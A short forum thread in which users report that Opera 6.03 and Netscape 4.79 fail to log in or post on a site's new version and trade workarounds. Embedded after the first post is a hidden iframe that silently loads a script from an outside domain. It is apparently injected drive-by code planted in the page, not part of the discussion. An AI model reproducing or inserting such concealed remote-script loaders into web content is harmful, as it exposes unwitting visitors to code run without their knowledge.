+ Reply to Thread

Opera is not supported on new site

Hello admin's,

It seems the new site does not support Opera (www.opera.com). I am running the latest version, Opera 6.03. Any plans to test and address this *MAJOR* oversight.

I also noticed, Netscape 4.79 on the Mac also pops up errors when attempting to login, or post a message to the site. One can click through these messages, but the Opera issue is not resolvable.

Thanks,
    -Ben<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I see the problem.... It seems to be something with logging in.. Once I am logged in I have no problem... (I am posting this reply from Opera Now) What I did to log on was that when I entered my u/p and clicked submit it went to a blank page. I pressed refresh and then when back to the homepage and I was logged on and able to reply.... Give it a try and let me know if that works for you... I will see what I can find about resolving the problem altogether...
    -=Jimmyjoe=-

This sounds like when I logged in from my '35 (with both Eudora and Blazer). When I entered my u/p it went to a blank screen, I thought something was screwed up. When I went back to the main screen it showed I was logged on.

It was nice to be able to read and post with my '35. (though it was a little slow.)

Cam

Hello jimmyjoe,

I tried what you said (Login and wait 10 sec, repeat and then click on the home page and go the topic), and was able to bring up the reply window, but then some redirect made the page disappear. The redirect seemed to occur within about a second. So, I finally was able to stop it and noticed that the Topic Review section was blank. I was thinking, maybe that field is attempting something that Opera does not like. Any ideas?

Thanks,
    -Ben